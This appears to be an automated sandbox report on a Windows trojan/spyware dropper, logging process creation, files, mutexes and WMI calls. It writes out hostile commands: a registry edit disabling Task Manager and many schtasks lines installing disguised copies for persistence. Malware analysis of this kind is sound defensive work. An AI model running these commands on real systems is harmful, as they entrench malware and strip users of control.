                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001390F000.00000004.00000800.00020000.00000000.sdmp, PKzrz8euGM.33.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001424F000.00000004.00000800.00020000.00000000.sdmp, xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                    Source: xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: cmd.exe, 00000021.00000002.2960240570.000000001424F000.00000004.00000800.00020000.00000000.sdmp, xu1yHoHXYs.33.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00366FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00366FAA
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036848E0_2_0036848E
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003700B70_2_003700B7
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003740880_2_00374088
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003640FE0_2_003640FE
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003771530_2_00377153
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003851C90_2_003851C9
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003632F70_2_003632F7
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003762CA0_2_003762CA
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003743BF0_2_003743BF
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036C4260_2_0036C426
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036F4610_2_0036F461
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0038D4400_2_0038D440
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003777EF0_2_003777EF
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036286B0_2_0036286B
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0038D8EE0_2_0038D8EE
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036E9B70_2_0036E9B7
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_003919F40_2_003919F4
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00376CDC0_2_00376CDC
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00373E0B0_2_00373E0B
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00384F9A0_2_00384F9A
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0036EFE20_2_0036EFE2
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BAD0DA88_2_00007FFD9BAD0DA8
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BC942C08_2_00007FFD9BC942C0
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BC8000A8_2_00007FFD9BC8000A
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeCode function: 8_2_00007FFD9BC934688_2_00007FFD9BC93468
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAD0DA832_2_00007FFD9BAD0DA8
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB1904632_2_00007FFD9BB19046
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB1900232_2_00007FFD9BB19002
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BB23CD632_2_00007FFD9BB23CD6
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAEAA0D32_2_00007FFD9BAEAA0D
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAEC3DD32_2_00007FFD9BAEC3DD
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAEBF5C32_2_00007FFD9BAEBF5C
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAEC18232_2_00007FFD9BAEC182
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 32_2_00007FFD9BAEC13532_2_00007FFD9BAEC135
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 34_2_00007FFD9BAB0DA834_2_00007FFD9BAB0DA8
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 35_2_00007FFD9BAA0DA835_2_00007FFD9BAA0DA8
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeCode function: 36_2_00007FFD9BA90DA836_2_00007FFD9BA90DA8
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAA0DA838_2_00007FFD9BAA0DA8
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAE900238_2_00007FFD9BAE9002
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAE904638_2_00007FFD9BAE9046
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAF8F3538_2_00007FFD9BAF8F35
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BAF3CD638_2_00007FFD9BAF3CD6
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BABAA0D38_2_00007FFD9BABAA0D
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BABC3DD38_2_00007FFD9BABC3DD
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BABBF5938_2_00007FFD9BABBF59
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BABC18238_2_00007FFD9BABC182
                                    Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 38_2_00007FFD9BABC13538_2_00007FFD9BABC135
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 39_2_00007FFD9BAC0DA839_2_00007FFD9BAC0DA8
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BB0904641_2_00007FFD9BB09046
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BB0900241_2_00007FFD9BB09002
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BB18F3541_2_00007FFD9BB18F35
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BB13CD641_2_00007FFD9BB13CD6
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BADAA0D41_2_00007FFD9BADAA0D
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BADC3DD41_2_00007FFD9BADC3DD
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BADBF5C41_2_00007FFD9BADBF5C
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BADC18241_2_00007FFD9BADC182
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BADC13541_2_00007FFD9BADC135
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 41_2_00007FFD9BAC0DA841_2_00007FFD9BAC0DA8
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BB0904644_2_00007FFD9BB09046
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BB0900244_2_00007FFD9BB09002
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BB18F3544_2_00007FFD9BB18F35
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BB13CD644_2_00007FFD9BB13CD6
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BAC0DA844_2_00007FFD9BAC0DA8
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BADAA0D44_2_00007FFD9BADAA0D
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BADC3DD44_2_00007FFD9BADC3DD
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BADBF5C44_2_00007FFD9BADBF5C
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BADC18244_2_00007FFD9BADC182
                                    Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exeCode function: 44_2_00007FFD9BADC13544_2_00007FFD9BADC135
                                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\SoftwareDistribution\cmd.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                    Source: Joe Sandbox ViewDropped File: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe FE7E66E8973A0886B54BAD8CD02A72B2FC81312DB742AB3E5C56919226D96A69
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: String function: 0037EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: String function: 0037F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: String function: 0037EC50 appears 56 times
                                    Source: RCtfAzVO.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: kJrNOFEGbQ.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs kJrNOFEGbQ.exe
                                    Source: kJrNOFEGbQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@51/81@0/1
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_00366C74 GetLastError,FormatMessageW,0_2_00366C74
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCode function: 0_2_0037A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0037A6C2
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exeJump to behavior
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\Desktop\RCtfAzVO.logJump to behavior
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeMutant created: \Sessions\1\BaseNamedObjects\Local\601e15a90bb00257f7c6912c3a0b56596eff0ce41f53b8f0d11a89075dccd10c
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeFile created: C:\Users\user\AppData\Local\Temp\flsapel1Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCommand line argument: sfxname0_2_0037DF1E
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCommand line argument: sfxstime0_2_0037DF1E
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCommand line argument: STARTDLG0_2_0037DF1E
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeCommand line argument: xz;0_2_0037DF1E
                                    Source: kJrNOFEGbQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kJrNOFEGbQ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\ProgramData\SoftwareDistribution\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: 3kIFDem3qM.33.dr, KkWX4W0WBB.33.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: kJrNOFEGbQ.exeReversingLabs: Detection: 73%
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeFile read: C:\Users\user\Desktop\kJrNOFEGbQ.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\kJrNOFEGbQ.exe "C:\Users\user\Desktop\kJrNOFEGbQ.exe"
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\hyperComponentFontDhcp\Mscommon.exe "C:\hyperComponentFontDhcp/Mscommon.exe"
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\SoftwareDistribution\cmd.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDDA4.tmp" "c:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP"
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 11 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 8 /tr "'C:\Windows\crx\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 10 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYz" /sc ONLOGON /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ruRRsbcJNKBbiFjvLZZICNpuYzr" /sc MINUTE /mo 13 /tr "'C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe'" /rl HIGHEST /f
                                    Source: C:\hyperComponentFontDhcp\Mscommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: unknownProcess created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                    Source: unknownProcess created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Program Files (x86)\jdownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                    Source: unknownProcess created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: unknownProcess created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: unknownProcess created: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe "C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe"
                                    Source: unknownProcess created: C:\ProgramData\SoftwareDistribution\cmd.exe "C:\Users\All Users\SoftwareDistribution\cmd.exe"
                                    Source: C:\Users\user\Desktop\kJrNOFEGbQ.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperComponentFontDhcp\uNXdwfIAGKhvsyaDygZbv1al18Fwyj4InpwIf.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperComponentFontDhcp\XvQn4w4rSFjKx2xId8OEvj2iij2aJuA.bat" "Jump to behavior
